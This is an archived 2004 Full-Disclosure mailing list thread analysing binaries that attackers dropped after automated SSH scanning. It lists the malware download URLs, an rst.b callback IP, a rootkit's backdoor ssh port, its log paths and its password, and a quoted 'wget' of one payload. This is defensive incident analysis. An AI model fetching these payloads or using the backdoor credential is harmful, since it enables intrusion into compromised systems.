| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: venom at gen-x.co.nz (VeNoMouS) Subject: Automated ssh scanning lol the amount of people still trying to work out what these binarys are is amusing, i already broke down what each package was and mailed it to full disclosure over 24hrs ago, dont you people read threads? I'll post it again..... www.bo2k-rulez.net/a kernel do_brk exploit by isec - http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php, infected with rst.b , which when run tries to connect to 207.66.155.21 on port 80 requesting /~telecom69/gov.php which is offline. www.corbeanu.as.ro/t.gz Ptrace/kmod kernel exploit by isec - http://www.k-otik.com/exploits/03.30.kernel.c.php http://roarmy.com/god.tgz root kit with backdoor'd ssh listens on port 26000 which replaces smbd binary, loggin of the ssh connections goes to /usr/include/iceconf.h , also has a crappy tcp sniffer which logs to /usr/lib/libice.log,and a syn flooder ***** backdoor password for this ssh door is ice4budu www.generatiapro.go.ro/fast.tgz emech setup for undernet to join #tty. ----- Original Message ----- From: "Ron DuFresne" <dufresne@...ternet.com> To: "Gary E. Miller" <gem@...lim.com> Cc: "Deigo Dude" <deigodude@....com>; <full-disclosure@...ts.netsys.com> Sent: Friday, August 27, 2004 11:59 AM Subject: Re: [Full-Disclosure] Automated ssh scanning > > Howdy Gary, > >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> Yo All! >> >> On Thu, 26 Aug 2004, Deigo Dude wrote: >> >> > Maybe running this test again, and this time ... >> >> No need to run the test again. >> >> - From the .history I duplicated this: >> >> wget www.bo2k-rulez.net/a >> >> Then did this to see the strings in the binary: >> >> strings a | less >> >> This string looked ineresting: >> >> Kernel seems not to be vulnerable >> >> A google on that string yields the exloit: >> >> http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php >> >> A simple exploit for the well known do_brk bug in the Linux kernel... >> > > Cool, I was incrrect in assuning this was a fully patched system and the > compromise likely being an application sploit it appears. > > > Thanks, > > Ron DuFresne > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > "Cutting the space budget really restores my faith in humanity. It > eliminates dreams, goals, and ideals and lets us get straight to the > business of hate, debauchery, and self-annihilation." -- Johnny Hart > ***testing, only testing, and damn good at it too!*** > > OK, so you're a Ph.D. Just don't touch anything. > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html >
Powered by blists - more mailing lists